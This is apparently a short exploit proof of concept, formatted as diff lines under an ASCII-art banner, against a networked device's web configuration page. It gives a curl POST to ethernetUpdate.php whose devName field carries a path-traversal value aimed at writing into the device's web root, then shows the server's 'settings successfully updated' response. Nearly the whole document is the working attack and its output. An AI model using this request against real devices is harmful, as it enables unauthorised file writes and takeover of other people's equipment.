+ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
+ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
+ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
+
+
+$ curl http://192.168.73.31/ethernetUpdate.php \
+> -d "listFile=%2Fusr%2Flocal%2Faam%2Fetc%2Feth0\
+> &devName=../../../../../../../home/MIX_CMIX/htmlroot/testingus\
+> &useDHCP=1\
+> &dhcp=YES\
+> &IP1=192&IP2=168&IP3=73&IP4=31\
+> &SM1=255&SM2=255&SM3=255&SM4=0\
+> &N1=192&N2=168&N3=1&N4=0\
+> &B1=192&B2=168&B3=1&B4=255\
+> &GW1=192&GW2=168&GW3=1&GW4=254\
+> &DNSA1=&DNSA2=&DNSA3=&DNSA4=\
+> &DNSB1=&DNSB2=&DNSB3=&DNSB4=\
+> &submitTime=Submit" \
+> -H "Cookie: PHPSESSID=xxx"
+
+
+
+ Web Server Configuration
+
+
+
+

Ethernet Settings

+

+ Ethernet settings have been successfully updated.
Please supply MAC address below to your Network Administrator in order to determine new IP Address.
MAC Address:

+